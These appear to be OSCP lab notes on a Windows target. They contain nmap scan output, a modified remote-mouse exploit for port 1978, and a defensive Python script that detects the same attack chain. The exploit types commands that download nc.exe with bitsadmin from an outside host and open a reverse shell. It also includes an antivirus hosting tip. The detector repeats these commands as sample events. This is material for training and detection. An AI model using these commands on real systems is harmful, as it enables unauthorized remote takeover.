OSCP Notes
Mice (Windows)

1978/tcp open unisql?
| fingerprint-strings:
| DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RTSPRequest, SIPOptions, SSLSessionReq, TLSSessionReq, ms-sql-s:
|_ SIN 15win nop nop 300
1979/tcp open unisql-java?
1980/tcp open pearldoc-xact?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: REMOTE-PC
| NetBIOS_Domain_Name: REMOTE-PC
| NetBIOS_Computer_Name: REMOTE-PC
| DNS_Domain_Name: Remote-PC
| DNS_Computer_Name: Remote-PC
| Product_Version: 10.0.19041
|_ System_Time: 2022-05-18T16:19:09+00:00
|_ssl-date: 2022-05-18T16:19:37+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Remote-PC
| Not valid before: 2022-05-17T00:09:34
|_Not valid after: 2022-11-16T00:09:34
7680/tcp open pando-pub?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Port 1978 has a public exploit. Modify the exploit script as follows (the helpers `MoveMouse`, `MousePress`, `SendString` and `mouse.leftClick` are the unmodified script's own; only the command strings and `PopCalc` change):
```python
from time import sleep

# Commands typed into the target's cmd.exe, one after another
cmd1 = 'mkdir c:\\pwn'
cmd2 = 'bitsadmin /transfer job /download /priority high http://192.168.49.183/nc.exe c:\\pwn\\nc.exe'
cmd3 = 'c:\\pwn\\nc.exe -e cmd.exe 192.168.49.183 443'

# MoveMouse, MousePress, SendString and mouse are defined in the original
# exploit script; this replaces its PopCalc function.
def PopCalc(ip):
    MoveMouse(-5000, 3000, ip)      # move the pointer to the bottom-left corner
    MousePress(mouse.leftClick, ip)
    sleep(1)
    SendString("cmd.exe", ip)       # launch a command prompt
    sleep(1)
    SendString("\n", ip)
    sleep(1)
    SendString(cmd1, ip)
    sleep(1)
    SendString("\n", ip)
    sleep(1)
    SendString(cmd2, ip)
    sleep(1)
    SendString("\n", ip)
    sleep(25)                       # wait for the bitsadmin download to finish
    SendString(cmd3, ip)
    sleep(1)
    SendString("\n", ip)
    print("SUCCESS!", ip)
```
Because of the antivirus setting, the file must be hosted on a real web server (Apache) rather than the Python web server, or the download will not work.
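From the defender's side, the chain above (a bitsadmin download to disk followed by nc.exe with -e) is easy to spot in process-creation telemetry. The following triage script is an added example, not part of these notes or of the exploit; the event shape, rule names and sample command lines are constructed assumptions.

```python
"""Flag the download-then-execute chain from these notes in process-creation events."""
import re

# Constructed sample events in the shape of Windows process-creation records
# (e.g. Security 4688 / Sysmon Event 1 CommandLine fields); not real telemetry.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "cmd": r"mkdir c:\pwn"},
    {"parent": "cmd.exe", "cmd": "bitsadmin /transfer job /download /priority high "
                                 r"http://192.168.49.183/nc.exe c:\pwn\nc.exe"},
    {"parent": "cmd.exe", "cmd": r"c:\pwn\nc.exe -e cmd.exe 192.168.49.183 443"},
    {"parent": "svchost.exe", "cmd": "bitsadmin /list /allusers"},      # benign admin use
    {"parent": "explorer.exe", "cmd": r"C:\Windows\System32\notepad.exe"},
]

# Each rule: (name, compiled pattern). Patterns mirror what cmd2 and cmd3 do.
RULES = [
    ("bits_download_to_disk",
     re.compile(r"bitsadmin(?:\.exe)?\s.*?/transfer\b.*?/download\b.*?\bhttps?://\S+\s+\S+", re.I)),
    ("netcat_exec_flag",
     re.compile(r"\bnc(?:at)?(?:\.exe)?\b.*\s-e\s+\S*cmd(?:\.exe)?\b", re.I)),
]

def classify(cmd: str) -> list[str]:
    """Return the names of every rule the command line matches."""
    return [name for name, pat in RULES if pat.search(cmd)]

def triage(events):
    """Return (matched events, chain_seen). chain_seen is True only when both
    the download rule and the execution rule fire within the batch, i.e. the
    full chain from the notes rather than an isolated bitsadmin or nc use."""
    hits, fired = [], set()
    for ev in events:
        names = classify(ev["cmd"])
        if names:
            hits.append({**ev, "rules": names})
            fired.update(names)
    chain_seen = {"bits_download_to_disk", "netcat_exec_flag"} <= fired
    return hits, chain_seen

if __name__ == "__main__":
    hits, chain_seen = triage(SAMPLE_EVENTS)
    for h in hits:
        print(h["rules"], h["cmd"])
    print("full download-then-execute chain seen:", chain_seen)
```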